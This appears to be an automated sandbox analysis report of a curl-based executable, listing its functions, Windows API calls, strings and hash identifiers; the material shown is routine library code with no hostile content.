                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: callocfree
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 306872129-0
                                                                                                                                                                                                  • Opcode ID: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                                                                                  • Instruction ID: 2cf10fde22bd10b9cf1038776ba6d48426e76a3efc8725fe98c3388aaf0a59f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c678f5ed1600a8b959c48394a6695923d33b67fef965bb8b888b8516cc0fb7c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5712832505BC185E3518F38E4443DD36A4EB45BB8F580339DBB90E7EADFB990848721
                                                                                                                                                                                                  Function 00007FF8B7EAF5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59stringwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FormatMessagestrchrwcstombs
                                                                                                                                                                                                  • String ID: Unknown error
                                                                                                                                                                                                  • API String ID: 4171340688-83687255
                                                                                                                                                                                                  • Opcode ID: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                                                                                  • Instruction ID: 20b75616e4022e7dd1f32ab4dcff40fbd223fcaef47b29663eaf83dfa28e55c8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a901455a9f3a64667489dd8f92dc32385fa8db47a44b5d6ab261f7e384b3a5a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2219262A0CBC185FB758B29A80436E6790AFC9BD4F444230CB9D4B7E5DF7CD4458750
                                                                                                                                                                                                  Function 00007FF8B7E74840 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF8B7EBC700: GetModuleHandleA.KERNEL32 ref: 00007FF8B7EBC746
                                                                                                                                                                                                    • Part of subcall function 00007FF8B7EBC700: GetProcAddress.KERNEL32 ref: 00007FF8B7EBC756
                                                                                                                                                                                                    • Part of subcall function 00007FF8B7EAFC30: GetModuleHandleW.KERNEL32 ref: 00007FF8B7EAFC44
                                                                                                                                                                                                  • GetProcAddressForCaller.KERNELBASE ref: 00007FF8B7E748A1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressHandleModuleProc$Caller
                                                                                                                                                                                                  • String ID: InitSecurityInterfaceW$secur32.dll$security.dll
                                                                                                                                                                                                  • API String ID: 2824060896-1950755585
                                                                                                                                                                                                  • Opcode ID: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                                                                                                                                                  • Instruction ID: 2603861a8f231203f5667608f2aed624a54050a6939b88ec18a9d12641476591
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c02c1c736985d97e36572f55ab4815c32138ce75a420f4355de45eaa3645f69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79014C64B19B4682EF44DB1DA8917A977E0BF49B80F880539EB4D46771EE3CE019C610
                                                                                                                                                                                                  Function 00007FF6CF9B6F4C Relevance: 6.2, APIs: 4, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF6CF9B6F37,?), ref: 00007FF6CF9B706A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                                                                                  • Opcode ID: 94d95521b1b01706eecbab5fac4e3e82ca01bb292129b5491e49817cb00286ab
                                                                                                                                                                                                  • Instruction ID: 95de673544cdc47023f7b1a225e7bf53ef5ea40e4e52c78c745afcd4f58770dd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94d95521b1b01706eecbab5fac4e3e82ca01bb292129b5491e49817cb00286ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9491E532E1865685FF70CF6594402BD2BA0BB44B8AF145636DE8FA778ACE38E445C721
                                                                                                                                                                                                  Function 00007FF8B7EC1420 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                                                                                                                                                                                  • API String ID: 0-3791222319
                                                                                                                                                                                                  • Opcode ID: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                                                                                                                                                  • Instruction ID: eb116f16877e726164013e66da7f8dd7f4604748750f6d71b63f8f155eaa4a8c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ff6bb89b665cf597bc51ea544f9db1bffba136d7b8ffb89bfd6ba5892530ca0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2417CA9A0874286FA20DA3E960427D6792AF55FE4F140231EF6E477F5EF3DE4498700
                                                                                                                                                                                                  Function 00007FF6CF9A3D7C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                                                  • Opcode ID: 3438edb8662da19bc615d821af10cf71c0ff8469271a0d978bd50ef382c822a1
                                                                                                                                                                                                  • Instruction ID: 20d5a10e61832ab120e788c6c042a1d9571a7d982891e5124f62ac6b726b0eac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3438edb8662da19bc615d821af10cf71c0ff8469271a0d978bd50ef382c822a1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16317E21E0C24386FE65AF689451BB923D19F81746F654434EACECB2EFDE2DA904C330
                                                                                                                                                                                                  Function 00007FF6CF9A28C8 Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2016263034-0
                                                                                                                                                                                                  • Opcode ID: 919e04b9d9b0c19205b013ca1f75545f09ace57d86454eb7d7f803c1edc4869e
                                                                                                                                                                                                  • Instruction ID: 559e211dade4a3025d3a13d475eb717a09607759936a41cf633824647d33303d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 919e04b9d9b0c19205b013ca1f75545f09ace57d86454eb7d7f803c1edc4869e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46215122E09B4686EF14AF21D55027967A4FF85FC5F584035CA8E873AADF3CE881C355
                                                                                                                                                                                                  Function 00007FF8B7E682D0 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastSleepgetsockopt
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3033474312-0
                                                                                                                                                                                                  • Opcode ID: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                                                                                  • Instruction ID: 4af8365953de711dcd97e62642a0111f90085789733a8cc89dffd7af133f4518
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3007daa6ba1534bb993b4a9225aa4e7a98e22bbefaf495e1ef6b3d265cceca8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4011A31A0874287E7648B29E45463EA7B0AF55FC4F644034EB8987AA4DF7DE449CB00
                                                                                                                                                                                                  Function 00007FF8B7E787F0 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8B7E6AAE9), ref: 00007FF8B7E787FB
                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8B7E6AAE9), ref: 00007FF8B7E78821
                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00007FF8B7E6AAE9), ref: 00007FF8B7E78835
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExclusiveLock$Release$Acquire
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1021914862-0
                                                                                                                                                                                                  • Opcode ID: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                                                                                                                                                  • Instruction ID: 883fb5b72efffdf90c5a385aa3038b4f62112c19ec4ad526df3c592ba44e670e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c02fb6c1fcb24a16d6f55f71e277d5c4db8b3561b8eb6c272e01fb65b4a3692
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F05E64E28A0385FA44AB29DC942BD32E1BF94F85FC00431D30E8A2B4FF2CE589C311
                                                                                                                                                                                                  Function 00007FF6CF9B3670 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: b69bc3652b8b47cd3b0de207084e308296e446f90ea6cf065fa76555c4147a68
                                                                                                                                                                                                  • Instruction ID: 212c8635d401f373deabd449a06416a8d89d7ac8c8aad80c3ed03cd6a12d9098
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b69bc3652b8b47cd3b0de207084e308296e446f90ea6cf065fa76555c4147a68
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28D09214F1860687FF287F7058EA4B917215F88B02B101978C88B8635BDD2D684C4360
                                                                                                                                                                                                  Function 00007FF6CF980390 Relevance: 3.8, APIs: 3, Instructions: 55sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                  • Opcode ID: 1ce4127e2e7c12c34186c6d80e1d9cfb398dc8e1d30225d72022c023aafcbb0b
                                                                                                                                                                                                  • Instruction ID: 0a5aa379660b369f6827a40412372cf467e92c5a2ead7b025d3093fbca7724eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ce4127e2e7c12c34186c6d80e1d9cfb398dc8e1d30225d72022c023aafcbb0b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211E751B1D78A82EE189B15A41107A5352EFC8BC1F549036EACE8BBEFDD2CE5414710
                                                                                                                                                                                                  Function 00007FF8B7EC5F80 Relevance: 3.8, APIs: 3, Instructions: 35COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                  • Opcode ID: a37464766f8cc36ff62fae178fc7976c0838dfec4ff49afa06ec2eac5bc2568f
                                                                                                                                                                                                  • Instruction ID: e6a38c9bf215d271d256eb56e724788542a08d1afcf8f6a520a05266fefc27e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37464766f8cc36ff62fae178fc7976c0838dfec4ff49afa06ec2eac5bc2568f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7012937A19B9182D7848F29E44016C77A4FB48F98F184522EB5A03B28CF38C4A5C750
                                                                                                                                                                                                  Function 00007FF6CF9B7C20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                                                  • API String ID: 544645111-2031265017
                                                                                                                                                                                                  • Opcode ID: 1f1f9f471098a01a8d2bc628c8e61c2a4d5bdc635f506fe8cc4808578dc9df36
                                                                                                                                                                                                  • Instruction ID: db243a3ec303d05457f7dc9c8618d364e50e378178fa0f1022ea2002e8ae46f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f1f9f471098a01a8d2bc628c8e61c2a4d5bdc635f506fe8cc4808578dc9df36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711E221B0864A52EE289FA2A8406B52310FB447B1F541B30EEBC837DACF7CE456C720
                                                                                                                                                                                                  Function 00007FF8B7E65CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ioctlsocketrecv
                                                                                                                                                                                                  • String ID: cf_socket_shutdown(%qd)
                                                                                                                                                                                                  • API String ID: 2464938158-3341341643
                                                                                                                                                                                                  • Opcode ID: 17d38f6d1d561d5458d91d58f5712dc195690641309d8514a42563887b4fcec5
                                                                                                                                                                                                  • Instruction ID: 79e52a73669681418db122809aa999b28d400b64765c4431235116297957cdaa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17d38f6d1d561d5458d91d58f5712dc195690641309d8514a42563887b4fcec5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30115E61708B8281EB609B39E8147AA2391AF49FD8F444232DB6C477EADE3CE056C714
                                                                                                                                                                                                  Function 00007FF8B7E843B0 Relevance: 3.0, APIs: 2, Instructions: 41networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
